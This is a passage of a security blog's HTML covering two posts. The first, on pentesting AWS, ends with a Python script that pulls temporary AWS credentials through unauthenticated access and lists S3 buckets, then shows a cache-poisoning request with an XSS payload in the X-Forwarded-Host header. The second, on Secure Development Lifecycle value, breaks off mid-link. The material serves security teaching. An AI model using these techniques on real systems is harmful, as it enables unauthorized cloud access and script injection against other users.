<span id="docs-internal-guid-ddccb4dc-7fff-15a0-f809-26357e11d383"><span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> secretKey = resp['Credentials']['SecretKey']</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span id="docs-internal-guid-ddccb4dc-7fff-15a0-f809-26357e11d383"><span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> accessKey = resp['Credentials']['AccessKeyId']</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span id="docs-internal-guid-ddccb4dc-7fff-15a0-f809-26357e11d383"><span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> sessionToken = resp['Credentials']['SessionToken']</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span id="docs-internal-guid-ddccb4dc-7fff-15a0-f809-26357e11d383"><span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> print "\nSecretKey: %s"%(secretKey)</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span id="docs-internal-guid-ddccb4dc-7fff-15a0-f809-26357e11d383"><span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> print "\nAccessKey ID: %s"%(accessKey)</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span id="docs-internal-guid-ddccb4dc-7fff-15a0-f809-26357e11d383"><span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> print "\nSessionToken %s"%(sessionToken)</span></span><br />
<span id="docs-internal-guid-ddccb4dc-7fff-15a0-f809-26357e11d383"><span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span id="docs-internal-guid-ddccb4dc-7fff-15a0-f809-26357e11d383"><span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> # Get all buckets names</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span id="docs-internal-guid-ddccb4dc-7fff-15a0-f809-26357e11d383"><span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> s3 = boto3.resource('s3',aws_access_key_id=accessKey, aws_secret_access_key=secretKey, aws_session_token=sessionToken, region_name="eu-west-1")</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span id="docs-internal-guid-ddccb4dc-7fff-15a0-f809-26357e11d383"><span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="font-size: 13.3333px;"> print "\nBuckets:"</span></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span id="docs-internal-guid-ddccb4dc-7fff-15a0-f809-26357e11d383"><span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> for b in s3.buckets.all():</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span id="docs-internal-guid-ddccb4dc-7fff-15a0-f809-26357e11d383"><span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> print b.name</span></span><br />
<span id="docs-internal-guid-ddccb4dc-7fff-15a0-f809-26357e11d383"><span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span id="docs-internal-guid-ddccb4dc-7fff-15a0-f809-26357e11d383"><span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">except (ClientError, KeyError):</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span id="docs-internal-guid-ddccb4dc-7fff-15a0-f809-26357e11d383"><span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> print "No Unauth"</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span id="docs-internal-guid-ddccb4dc-7fff-15a0-f809-26357e11d383"><span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> exit(0)</span></span></div>
<div>
<span id="docs-internal-guid-ddccb4dc-7fff-15a0-f809-26357e11d383"><span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span></span></div>
</div>
<span id="docs-internal-guid-ddccb4dc-7fff-15a0-f809-26357e11d383">
</span>
<br />
<div>
<br />
<br />
If unauthenticated user access to AWS S3 buckets is allowed, your output should look something like this:<br />
<br /></div>
</div>
<div>
<!--BEGIN OUTPUT-->
<br />
<div dir="ltr" style="background: rgb(242, 242, 242); border: 1px solid rgb(140, 140, 140); font-family: "courier new", courier, monospace; font-size: 10pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 5px;">
Identity ID: us-east-2:ddeb887a-e235-41a1-be75-2a5f675e0944
<br />
<br />
Request ID: cb3d99ba-b2b0-11e8-9529-0b4be486f793
<br />
<br />
SecretKey: wJE/[REDACTED]Kru76jp4i
<br />
<br />
AccessKey ID: ASI[REDACTED]MAO3
<br />
<br />
SessionToken AgoGb3JpZ2luELf[REDACTED]wWeDg8CjW9MPerytwF<br />
<br />
Buckets:
<br />
mindeds3log
<br />
mindeds3test01
</div>
<!--END OUTPUT-->
<br />
<div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9_-0EZYHXOs7xtXH18y0jCmhOFXekmc1D_wr9VRpJyouliCMPnLSna0jTf2j-V_wz0wsNudXYmplVynTeZ6JpWyPYvhFQEuAqbGZoVpRgaLVwV9i5izoCkQ4u-noW4JDPsxum8F7Le32A/s1600/NetworkingContentDelivery_AmazonCloudFront.png" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" data-original-height="400" data-original-width="400" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9_-0EZYHXOs7xtXH18y0jCmhOFXekmc1D_wr9VRpJyouliCMPnLSna0jTf2j-V_wz0wsNudXYmplVynTeZ6JpWyPYvhFQEuAqbGZoVpRgaLVwV9i5izoCkQ4u-noW4JDPsxum8F7Le32A/s200/NetworkingContentDelivery_AmazonCloudFront.png" width="200" /></a><br />
<br /></div>
<div>
<h3>
AWS CloudFront
</h3>
</div>
<div>
AWS CloudFront is Amazon's answer to a Content Delivery Network service which purpose is to improving the performances of delivering content from web applications.<br />
The following images depict the basics of how CloudFront work.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-dVmx2pRUTk8w6lUEJGleDw4EqslHQDypUlD9YRVy7SsoerM1inLFI7NQcO1spbYZaTidwZ755TB0_KazFp4TZQfjBrv3m_kuKRJUhE_fVNvR9iRcot2ujGjoVbzEYDxKPksogfpR40ys/s1600/CloudFront+01.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="219" data-original-width="646" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-dVmx2pRUTk8w6lUEJGleDw4EqslHQDypUlD9YRVy7SsoerM1inLFI7NQcO1spbYZaTidwZ755TB0_KazFp4TZQfjBrv3m_kuKRJUhE_fVNvR9iRcot2ujGjoVbzEYDxKPksogfpR40ys/s1600/CloudFront+01.png" /></a></div>
The browser requests <i>resource X</i> from the edge location.<br />
If the edge location has a cached copy of <i>resource X</i> it simply sends it back to the browser.<br />
<br />
The following picture describes what happens if <i>resource X</i> is not cached in the edge location.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF6Kd_Myda1gMZOxJuWEdbuwGlDJVhg-MbCXj4kueT6iXZ5h1ehzej-6Icfsasv7Cz8-b96qMK9SPW3NLZgE9Gn-2g8SYEfXumSl8m42R6caR5yD4Ply8TnyA2MG8F8L78uKLTxGTFjzIU/s1600/CloudFront+02.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="282" data-original-width="1185" height="152" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF6Kd_Myda1gMZOxJuWEdbuwGlDJVhg-MbCXj4kueT6iXZ5h1ehzej-6Icfsasv7Cz8-b96qMK9SPW3NLZgE9Gn-2g8SYEfXumSl8m42R6caR5yD4Ply8TnyA2MG8F8L78uKLTxGTFjzIU/s640/CloudFront+02.png" width="640" /></a></div>
<br />
<br />
<br />
<ul>
<li>The browser requests <i>resource X</i> to the edge location which doesn't have a cached version. </li>
<li>The edge location thus requests <i>resource X</i> to its origin, meaning where the original copy of <i>resource X</i> is stored. (This is decided upon configuring CloudFront for a given domain. )</li>
<li>The origin location can be, for example, an Amazon service such as an S3 bucket, or a different server not being part of Amazon. </li>
<li>The edge location receives <i>resource X</i> and stores it in its cache for future use and finally sends it back to the browser. </li>
</ul>
<br />
This simple caching mechanism can be very helpful when it comes to improve the performances of querying a web application but it might also hide some unwanted behavior.<br />
<br /></div>
<div>
As recently shown by <a href="https://portswigger.net/blog/practical-web-cache-poisoning" target="_blank">James Kettle</a>, web applications relying on cache for dynamic pages should be aware of the possibility to abuse such caching functionality and deliver malicious content to the users a.k.a. cache poisoning.<br />
<span style="font-family: arial; font-size: 14.6667px; white-space: pre-wrap;">Briefly, as described by Kettle in </span><a href="https://portswigger.net/blog/practical-web-cache-poisoning" style="font-family: arial; font-size: 14.6667px; white-space: pre-wrap;" target="_blank">his post</a><span style="font-family: arial; font-size: 14.6667px; white-space: pre-wrap;">, web cache systems need a way to uniquely identify a request in order to not keep contacting the origin location. </span><br />
<span style="font-family: arial; font-size: 14.6667px; white-space: pre-wrap;">To do so, few parts of an HTTP request are considered to fully identify the request and are called </span><b style="font-family: arial; font-size: 14.6667px; white-space: pre-wrap;">cache keys</b><span style="font-family: arial; font-size: 14.6667px; white-space: pre-wrap;">. Whenever a cache key changes, the caching system will consider it as a different request and, if it doesn't have a cached copy of it, will contact the origin location. </span><br />
<span style="font-family: arial; font-size: 14.6667px; white-space: pre-wrap;">The basic idea behind web applications cache poisoning is to find an HTTP parameter that is not a cache key and that can be used to manipulate the content of a web page. When such a parameter is found, an attacker might be able to cache a request containing a malicious payload for that parameter and, whenever other users perform the same request, the caching system will answer with the cached version containing the malicious payload.</span><br />
<span style="font-family: arial; font-size: 14.6667px; white-space: pre-wrap;"><br /></span>
<span style="font-family: arial; font-size: 14.6667px; white-space: pre-wrap;">Let's consider the following simple request taken from James' post:</span><br />
<span style="font-family: arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></span></div>
<!--BEGIN REQ-->
<br />
<div style="background: rgb(242, 242, 242); border: 1px solid rgb(140, 140, 140); font-family: "courier new", courier, monospace; font-size: 10pt; padding: 5px;">
<span style="white-space: pre-wrap;">GET /en?cb=1 HTTP/1.1</span>
<br />
<span pre-wrap="" white-space:="">Host: www.redhat.com</span><br />
<span pre-wrap="" white-space:="">X-Forwarded-Host: <span style="color: orange;">canary</span></span><br />
<span pre-wrap="" white-space:=""><br /></span>
<span pre-wrap="" white-space:="">HTTP/1.1 200 OK</span><br />
<span pre-wrap="" white-space:="">Cache-Control: public, no-cache</span><br />
<span pre-wrap="" white-space:="">…</span><br />
<span pre-wrap="" white-space:=""><meta property="og:image" content="https://<span style="color: orange;">canary</span>/cms/social.png" /> </span>
</div>
<!--END REQ-->
<br />
<div>
<span id="docs-internal-guid-571bbcba-7fff-93a8-83c6-54581aeb470e">
</span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: arial; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<span id="docs-internal-guid-571bbcba-7fff-93a8-83c6-54581aeb470e"><span style="font-family: arial; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">The value for X-Forwarded-Host has been used to generate an Open Graph URL inside a meta tag in the HTML of the web page. By changing <span style="color: orange;">canary</span> with <span style="color: orange;">a."><script>alert(1)</script> </span>it's possible to mess with the HTML and generate an alert box. </span></span><br />
<span style="font-family: arial; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<!--BEGIN REQ2-->
<br />
<div style="background: rgb(242, 242, 242); border: 1px solid rgb(140, 140, 140); font-family: "courier new", courier, monospace; font-size: 10pt; padding: 5px;">
<span style="white-space: pre-wrap;">GET /en?cb=1 HTTP/1.1</span>
<br />
<span style="white-space: pre-wrap;">Host: www.redhat.com</span><br />
<span style="white-space: pre-wrap;">X-Forwarded-Host: </span><span style="color: orange; white-space: pre-wrap;">a."><script>alert(1)</script></span><br />
<span pre-wrap="" white-space:=""><br /></span>
</div>
<!--END REQ2-->
<!--BEGIN RESP2-->
<br />
<br />
<div style="background: rgb(242, 242, 242); border: 1px solid rgb(140, 140, 140); font-family: "courier new", courier, monospace; font-size: 10pt; padding: 5px;">
<span style="white-space: pre-wrap;">HTTP/1.1 200 OK</span>
<br />
<span style="white-space: pre-wrap;">Cache-Control: public, no-cache</span><br />
<span style="white-space: pre-wrap;">…</span><br />
<span style="white-space: pre-wrap;"><meta property="og:image" content="https://</span><span style="color: orange; white-space: pre-wrap;">a."><script>alert(1)</script></span><span style="white-space: pre-wrap;">/cms/social.png" /> </span>
</div>
<span style="font-family: arial; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: 11pt;"><br /></span></span>
<span style="font-family: arial; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: 11pt;">However, in this case, X-Forwarded-Host is not used as a cache key. This means that it is possible to cache the request containing the alert code in the web cache so that it will be served to other users in the future. As it becomes clear from James' post, X-Forwarded-Host and X-Forwarded-Server are two widely used HTTP headers that do not contribute in the set of cache keys and are valuable candidates to perform cache poisoning attacks. </span></span>James has also developed a Burp plug-in called <a href="https://github.com/PortSwigger/param-miner" target="_blank">param-miner</a> that can be used to identify HTTP parameters that are not used as cached keys.<br />
<div>
<h3>
Conclusion</h3>
</div>
<div>
This post concludes our journey into the main Amazon Web Services and how to account for them when testing the security of web applications.<br />
It is undeniable that AWS provides a comprehensive solution that companies take advantage of instead of having to take care of the entire infrastructure by themselves. However, companies are the ones in charge of managing the configurations of the services they decide to use. It thus becomes crucial to test and verify such configurations.</div>
</div>
</div>
Federico De Meohttp://www.blogger.com/profile/13823957133316817764noreply@blogger.com0tag:blogger.com,1999:blog-7122745763234660283.post-4568978048957118312019-04-11T01:52:00.000-07:002019-04-11T01:52:26.968-07:00Secure Development Lifecycle: the SDL value evolution. Part 1<div class="graf graf--p graf-after--h3" id="4be8" name="4be8" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 8px;">
<span class="markup--strong markup--p-strong" style="font-weight: 700;">Observability and metrics paradox</span></div>
<div class="graf graf--p graf-after--p" id="305c" name="305c" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
It is also about observability: <em class="markup--em markup--p-em" style="font-feature-settings: "liga", "salt";">”If a tree falls in a forest and no one is around to hear it, does it make a sound?”</em> …or… What is the return value (in dollars number) of having a better SDL in place if your company wasn’t shaken by cybersecurity incidents? I see a little paradox here, after spending big budget into security you cannot measure the returns, even more, the returns are less visible: you don’t have incidents in the first place…and if they happen then “someone saves you”, you may have prevented 9/10 of incidents but it is difficult to make a counterfactual argument at that point.</div>
<div class="graf graf--p graf-after--p" id="b1ef" name="b1ef" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
Oh yes, if you had big problems in the past you can then see the statistical improvements over time, Microsoft did.</div>
<br />
<figure class="graf graf--figure graf-after--p" id="0797" name="0797" style="background-color: white; box-sizing: border-box; clear: both; color: rgba(0, 0, 0, 0.84); font-family: medium-content-sans-serif-font, -apple-system, system-ui, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif; font-size: 20px; margin: 43px 0px 0px; outline: 0px; position: relative; user-select: auto; z-index: 100;"><div class="aspectRatioPlaceholder is-locked" style="margin: 0px auto; max-height: 344px; max-width: 700px; position: relative; width: 700px;">
<div class="aspectRatioPlaceholder-fill" style="padding-bottom: 343.688px;">
</div>
<div class="progressiveMedia js-progressiveMedia graf-image is-canvasLoaded is-imageLoaded" data-action-value="0*k2B9aWyuvuscA9A2" data-action="zoom" data-height="577" data-image-id="0*k2B9aWyuvuscA9A2" data-is-featured="true" data-scroll="native" data-width="1175" style="background: rgba(0, 0, 0, 0); box-sizing: border-box; cursor: zoom-in; height: 343.688px; left: 0px; margin: auto; max-width: 100%; position: absolute; top: 0px; transition: background 0.2s ease 0s; width: 700px;">
<canvas class="progressiveMedia-canvas js-progressiveMedia-canvas" height="36" style="backface-visibility: hidden; box-sizing: border-box; display: block; height: 343.688px; left: 0px; margin: auto; opacity: 0; position: absolute; top: 0px; transition: visibility 0s linear 0.5s, opacity 0.1s ease 0.4s; vertical-align: baseline; visibility: hidden; width: 700px;" width="75"></canvas><img class="progressiveMedia-image js-progressiveMedia-image" data-src="https://cdn-images-1.medium.com/max/1600/0*k2B9aWyuvuscA9A2" src="https://cdn-images-1.medium.com/max/1600/0*k2B9aWyuvuscA9A2" style="backface-visibility: hidden; border: 0px; box-sizing: border-box; display: block; height: 343.688px; left: 0px; margin: auto; opacity: 1; position: absolute; top: 0px; transition: visibility 0s linear 0s, opacity 0.4s ease 0s; visibility: visible; width: 700px; z-index: 100;" /></div>
</div>
</figure><br />
<blockquote class="graf graf--blockquote graf-after--figure" id="9b8e" name="9b8e" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; border-left: 3px solid rgba(0, 0, 0, 0.84); color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; font-style: italic; letter-spacing: -0.003em; line-height: 1.58; margin: 38px 0px 0px -23px; padding-bottom: 2px; padding-left: 20px;">
From: <a href="https://www.owasp.org/images/9/92/OWASP_SwSec5D_Presentation_-_Oct18.pdf">https://www.owasp.org/images/9/92/OWASP_SwSec5D_Presentation_-_Oct18.pdf</a></blockquote>
<div class="graf graf--p graf-after--blockquote" id="e012" name="e012" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
<span class="markup--strong markup--p-strong" style="font-weight: 700;"> Microsoft case teaches</span></div>
<div class="graf graf--p graf-after--p" id="45c6" name="45c6" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
Microsoft had a nice market position and did deal with security in the early 2000s. Not any company has a de facto monopoly in the market. Your company has competitors and alternatives, needs reputation…and let’s not dig too deep into cyber-fines scenarios.</div>
<div class="graf graf--p graf-after--p" id="277b" name="277b" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
MS in the early 2000’s put great efforts in defining and in applying SDL and still nowadays MS SDL is the reference implementation. That was the genesis of SDL as we know it today, practices like STRIDE Threat Modeling are de-facto standards in the industry.</div>
<div class="graf graf--p graf-after--p" id="0663" name="0663" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
Fortunately, the metrics paradox is getting weakened by the fact that <span class="markup--strong markup--p-strong" style="font-weight: 700;">SDL is becoming a value in itself</span>, that can be shown, that completes quality, that enhances reputation, marketing and it is content more than form (not only compliance), we’ll see how security principles are taken over formal compliance checklists.</div>
<div class="graf graf--p graf-after--p" id="c442" name="c442" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
<span class="markup--strong markup--p-strong" style="font-weight: 700;">Dear <big tech firm here>, can I evaluate your Secure Development Lifecycle?</span></div>
<div class="graf graf--p graf-after--p" id="ecf8" name="ecf8" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
<span class="markup--strong markup--p-strong" style="font-weight: 700;">Supply chain customers</span> start to demand secure process itself, not only secure products and certifications (assuming it is even plausible). An example is the case of UK Gov relation with Huawei, but I’m confident others will follow. The next extract is from <a class="markup--anchor markup--p-anchor" data-href="https://www.gov.uk/government/publications/huawei-cyber-security-evaluation-centre-oversight-board-annual-report-2019" href="https://www.gov.uk/government/publications/huawei-cyber-security-evaluation-centre-oversight-board-annual-report-2019" rel="nofollow noopener" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0.54); background-color: transparent; background-image: url("data:image/svg+xml; background-position: 0px calc(1em + 1px); background-repeat: repeat-x; background-size: 1px 1px; http: //www.w3.org/2000/svg\"><line x1=\"0\" y1=\"0\" x2=\"1\" y2=\"1\" stroke=\"currentColor\" /></svg>"); text-decoration-line: none;" target="_blank">Huawei cyber security evaluation centre oversight board: annual report 2019</a> </div>
<blockquote class="graf graf--blockquote graf--startsWithDoubleQuote graf-after--p" id="9404" name="9404" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; border-left: 3px solid rgba(0, 0, 0, 0.84); color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; font-style: italic; letter-spacing: -0.003em; line-height: 1.58; margin: 29px 0px 0px -23px; padding-bottom: 2px; padding-left: 20px;">
“3.35 …analysed the adherence of the product to part of Huawei’s own secure coding guidelines, namely safe memory handling functions. … analysed for the use … of memcpy()-like, strcpy()-like and sprintf()-like functions in their safe and unsafe variants.”</blockquote>
<div class="graf graf--p graf-after--blockquote" id="1df7" name="1df7" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
Not many companies with some complexity and history could quietly survive a similar analysis.</div>
<div class="graf graf--p graf-after--p" id="75d9" name="75d9" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
<span class="markup--strong markup--p-strong" style="font-weight: 700;">Principles based practices and cyber-environmentally safety requirement</span></div>
<div class="graf graf--p graf-after--p" id="a783" name="a783" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
The security demand cannot be met only by compliance requirements, compliance, in its various forms (PCI, ISOXXXX) is still a necessary “sine qua non” condition, but customers and counterparties demand more substance behind that. We can observe this “substance winning over form” for example in GDPR as a principles based regulation, as well as in the demand for security processes results to key vendors (see Huawei report from cybersecurity government agency).</div>
<blockquote class="graf graf--blockquote graf-after--p" id="2141" name="2141" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; border-left: 3px solid rgba(0, 0, 0, 0.84); color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; font-style: italic; letter-spacing: -0.003em; line-height: 1.58; margin: 29px 0px 0px -23px; padding-bottom: 2px; padding-left: 20px;">
From Wikipedia, GDPR: <a class="markup--anchor markup--blockquote-anchor" data-href="https://en.wikipedia.org/wiki/General_Data_Protection_Regulation" href="https://en.wikipedia.org/wiki/General_Data_Protection_Regulation" rel="nofollow noopener" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0.54); background-color: transparent; background-image: url("data:image/svg+xml; background-position: 0px calc(1em + 1px); background-repeat: repeat-x; background-size: 1px 1px; http: //www.w3.org/2000/svg\"><line x1=\"0\" y1=\"0\" x2=\"1\" y2=\"1\" stroke=\"currentColor\" /></svg>"); text-decoration-line: none;" target="_blank">“Controllers of personal data must put in place<span class="markup--em markup--blockquote-em" style="font-feature-settings: "liga", "salt"; font-style: normal;">appropriate technical and organisational measures</span> to implement the data protection principles</a>”</blockquote>
<div class="graf graf--p graf-after--blockquote" id="83fe" name="83fe" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
With that clear in mind, it doesn’t take too long to forecast that an enterprise investing in security principles and <em class="markup--em markup--p-em" style="font-feature-settings: "liga", "salt";">substantial</em> SDL will have a <span class="markup--strong markup--p-strong" style="font-weight: 700;">double advantage</span>, the genesis/primordial one: <span class="markup--strong markup--p-strong" style="font-weight: 700;">more secure product</span> (e.g. MS 2002) but also the newer one coming for the <span class="markup--strong markup--p-strong" style="font-weight: 700;">visibility,</span> that customers demand now more and more.</div>
<div class="graf graf--p graf-after--p" id="9d35" name="9d35" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
SDL was a means to have more secure product, today even more, is becoming a company “value” and something in the realm of morality and ethics, not so different from environmental sustainability. Also, the earlier a company is in the supply chain (hardware, operative system, authentication server, payment gateway, dev frameworks) the more it should care as the biggest is the damage they can do to the information technology environment. Latests year’s Spectre, Heartbleed, <a class="markup--anchor markup--p-anchor" data-href="https://en.wikipedia.org/wiki/EternalBlue" href="https://en.wikipedia.org/wiki/EternalBlue" rel="nofollow noopener" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0.54); background-color: transparent; background-image: url("data:image/svg+xml; background-position: 0px calc(1em + 1px); background-repeat: repeat-x; background-size: 1px 1px; http: //www.w3.org/2000/svg\"><line x1=\"0\" y1=\"0\" x2=\"1\" y2=\"1\" stroke=\"currentColor\" /></svg>"); text-decoration-line: none;" target="_blank">EternalBlue</a>, BIOS and <a class="markup--anchor markup--p-anchor" data-href="https://www.theverge.com/2019/3/25/18280716/asus-update-tool-hacked-shadowhammer-malware" 